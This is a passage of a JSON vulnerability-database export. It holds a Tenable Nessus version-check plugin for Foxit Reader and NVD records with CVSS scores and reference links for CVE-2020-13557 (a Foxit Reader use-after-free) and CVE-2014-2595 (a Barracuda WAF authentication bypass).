"modified": "2021-10-18T11:44:24", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T11:44:24", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}], "cve": [{"id": "CVE-2020-13557", "bulletinFamily": "NVD", "title": "CVE-2020-13557", "description": "A use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "published": "2020-12-22T18:15:00", "modified": "2020-12-23T15:30:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13557", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"], "cvelist": ["CVE-2020-13557"], "type": "cve", "lastseen": "2021-04-23T01:09:35", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "foxitsoftware:foxit_reader", "name": "foxitsoftware foxit reader", "operator": "eq", "version": "10.1.0.37527"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:foxitsoftware:foxit_reader:10.1.0.37527"], "cpe23": ["cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-13557"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "A use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-02-02T07:36:58", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1171"], "type": "talos"}], "rev": 2}, "score": {"modified": "2021-02-02T07:36:58", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"}], "hash": "33288f24aab5d33cc564e5b47b4d8e3fbbd39412758de16fc44dfc0d0bc4c681", "hashmap": [{"hash": "6e1276ee5adeb15b996da07912f50cb9", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "905458c6bf83ed807913f4777c50de47", "key": "published"}, {"hash": "e0a0afae7d35d9db35918db5bdcbab23", "key": "references"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "328fbb8b2d6bc0b15f944933c639c420", "key": "cpe23"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "b16d25a1771659bd4fe12a40d0f7c274", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "83f8e1184524ba41542fc3918c29be0a", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "06740f628230eee658e65e5ebdcfa5d9", "key": "cvelist"}, {"hash": "40570ed17e09b51fae8881275bc39339", "key": "extraReferences"}, {"hash": "d8fb251689e23e235a1155f2a58a438b", "key": "affectedSoftware"}, {"hash": "f58f10899d7b76d117eaeb6d281a44b6", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "294953a65806be71ea1b464710be176e", "key": "href"}, {"hash": "7b49325ff1ca4284b8caf6c49c591248", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "165f63ccba689164d26bfa746618a8f3", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13557", "id": "CVE-2020-13557", "immutableFields": [], "lastseen": "2021-02-02T07:36:58", "modified": "2020-12-23T15:30:00", "objectVersion": "1.5", "published": "2020-12-22T18:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"], "reporter": "cve@mitre.org", "title": "CVE-2020-13557", "type": "cve", "viewCount": 10}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 3, "lastseen": "2021-02-02T07:36:58"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-13557"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "A use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-12-23T13:51:46", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1171"], "type": "talos"}], "rev": 2}, "score": {"modified": "2020-12-23T13:51:46", "rev": 2, "value": 3.5, "vector": "NONE"}}, "hash": "d8cb0bbb2dc2fda2b2602e102883c8eb13d331d8878768d2eb5a74ec075096e7", "hashmap": [{"hash": "905458c6bf83ed807913f4777c50de47", "key": "published"}, {"hash": "e0a0afae7d35d9db35918db5bdcbab23", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "691c6d2374b01a1789b3ddb2b399abab", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "83f8e1184524ba41542fc3918c29be0a", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "06740f628230eee658e65e5ebdcfa5d9", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "f58f10899d7b76d117eaeb6d281a44b6", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "294953a65806be71ea1b464710be176e", "key": "href"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13557", "id": "CVE-2020-13557", "lastseen": "2020-12-23T13:51:46", "modified": "2020-12-22T18:42:00", "objectVersion": "1.3", "published": "2020-12-22T18:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"], "reporter": "cve@mitre.org", "title": "CVE-2020-13557", "type": "cve", "viewCount": 1}, "differentElements": ["cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2020-12-23T13:51:46"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "foxitsoftware:foxit_reader", "name": "foxitsoftware foxit reader", "operator": "eq", "version": "10.1.0.37527"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:foxitsoftware:foxit_reader:10.1.0.37527"], "cpe23": ["cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-13557"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "A use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-12-24T13:57:49", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1171"], "type": "talos"}], "rev": 2}, "score": {"modified": "2020-12-24T13:57:49", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [], "hash": "59b1da3f2f17d5b50a843ebdf44132de710beca214af12e7602a6ab2116bba89", "hashmap": [{"hash": "6e1276ee5adeb15b996da07912f50cb9", "key": "modified"}, {"hash": "905458c6bf83ed807913f4777c50de47", "key": "published"}, {"hash": "e0a0afae7d35d9db35918db5bdcbab23", "key": "references"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "328fbb8b2d6bc0b15f944933c639c420", "key": "cpe23"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "b16d25a1771659bd4fe12a40d0f7c274", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "83f8e1184524ba41542fc3918c29be0a", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "06740f628230eee658e65e5ebdcfa5d9", "key": "cvelist"}, {"hash": "d8fb251689e23e235a1155f2a58a438b", "key": "affectedSoftware"}, {"hash": "f58f10899d7b76d117eaeb6d281a44b6", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "294953a65806be71ea1b464710be176e", "key": "href"}, {"hash": "7b49325ff1ca4284b8caf6c49c591248", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "165f63ccba689164d26bfa746618a8f3", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13557", "id": "CVE-2020-13557", "lastseen": "2020-12-24T13:57:49", "modified": "2020-12-23T15:30:00", "objectVersion": "1.3", "published": "2020-12-22T18:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"], "reporter": "cve@mitre.org", "title": "CVE-2020-13557", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 2, "lastseen": "2020-12-24T13:57:49"}], "edition": 4, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d8fb251689e23e235a1155f2a58a438b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "165f63ccba689164d26bfa746618a8f3"}, {"key": "cpe23", "hash": "328fbb8b2d6bc0b15f944933c639c420"}, {"key": "cpeConfiguration", "hash": "022aad19eeb71ea0441b11d2b57f5903"}, {"key": "cvelist", "hash": "06740f628230eee658e65e5ebdcfa5d9"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "b16d25a1771659bd4fe12a40d0f7c274"}, {"key": "cwe", "hash": "6e8bd440f4fb55ae63bba09dfc27a808"}, {"key": "description", "hash": "83f8e1184524ba41542fc3918c29be0a"}, {"key": "extraReferences", "hash": "40570ed17e09b51fae8881275bc39339"}, {"key": "href", "hash": "294953a65806be71ea1b464710be176e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "6e1276ee5adeb15b996da07912f50cb9"}, {"key": "published", "hash": "905458c6bf83ed807913f4777c50de47"}, {"key": "references", "hash": "e0a0afae7d35d9db35918db5bdcbab23"}, {"key": "reporter", "hash": "902ce3113d3d89e1d92e6853b7fd48b7"}, {"key": "title", "hash": "f58f10899d7b76d117eaeb6d281a44b6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3fefe5cc12f9b2530dbb37073265f9517f995419d91765a1e7d5e3b87524f549", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "talos", "idList": ["TALOS-2020-1171"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}], "modified": "2021-04-23T01:09:35", "rev": 2}, "score": {"value": 3.5, "vector": "NONE", "modified": "2021-04-23T01:09:35", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:foxitsoftware:foxit_reader:10.1.0.37527"], "affectedSoftware": [{"cpeName": "foxitsoftware:foxit_reader", "name": "foxitsoftware foxit reader", "operator": "eq", "version": "10.1.0.37527"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:foxitsoftware:foxit_reader:10.1.0.37527:*:*:*:*:*:*:*"], "cwe": ["CWE-416"], "scheme": null, "extraReferences": [{"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171"}], "immutableFields": []}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, 